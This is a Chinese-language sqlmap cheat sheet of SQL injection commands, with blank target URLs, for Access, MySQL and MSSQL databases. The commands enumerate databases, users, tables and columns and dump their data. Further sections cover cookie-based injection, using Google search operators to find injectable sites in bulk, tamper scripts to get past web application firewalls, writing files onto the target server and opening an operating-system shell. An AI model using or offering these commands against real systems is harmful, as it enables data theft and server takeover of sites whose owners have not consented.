access数据库注入
sqlmap.py -u ""sqlmap.py -u "" --tables 参数:列表名sqlmap.py -u "" --columns -T "" 参数:列字段sqlmap.py -u "" --dump -C "" -T "" 参数:下载数据
MySQL数据库注入
sqlmap.py -u ""sqlmap.py -u "" --is-dba 当前用户权限sqlmap.py -u "" --dbs 所有数据库sqlmap.py -u "" --current-db 网站当前数据库sqlmap.py -u "" --users 所有数据库用户sqlmap.py -u "" --current-user 当前数据库用户sqlmap.py -u "" --tables -D ""sqlmap.py -u "" --columns -T "" -D ""sqlmap.py -u "" --dump -C "" -T "" -D ""
MsSQL数据库注入
sqlmap.py -u ""sqlmap.py -u "" --is-dba 当前用户权限sqlmap.py -u "" --dbs 所有数据库sqlmap.py -u "" --users 所有数据库用户sqlmap.py -u "" --current-db 网站当前数据库sqlmap.py -u "" --current-user 当前数据库用户sqlmap.py -u "" --tables -D ""sqlmap.py -u "" --columns -T "" -D ""sqlmap.py -u "" --dump -C "" -T "" -D ""(sqlmap.py -u "" --dump -T "" -D "")
Cookie中转注入
sqlmap.py -u ""sqlmap.py -u "" --cookie "id=?" --level ?sqlmap.py -u "" --cookie "id=?" --level ? --tablessqlmap.py -u "" --cookie "id=?" --level ? --columns -T ""sqlmap.py -u "" --cookie "id=?" --level ? --dump -C "" -T ""
利用google批量搜索注入
sqlmap.py -g "" 谷歌关键字搜索
搜索引擎语法:
inurl:intext:intitle:site:
tamper插件使用
sqlmap.py -u ""sqlmap.py -u "" -v 3 --batch -- tamper ""sqlmap.py -u "" --check-waf --tamper ""
file参数使用(必须是dba)
sqlmap.py -u ""sqlmap.py -u "" --is-dba 当前用户权限sqlmap.py -u "" --file-write=D:/需上传的文件名 --file-dest=硬盘:/文件夹/.../需上传的文件列名
post提交方式注入
sqlmap.py -u "" --formssqlmap.py -r "" 文本文档名
OS参数
sqlmap.py -u "" --os-cmd= (推荐win)sqlmap.py -u "" --os-shell (exit)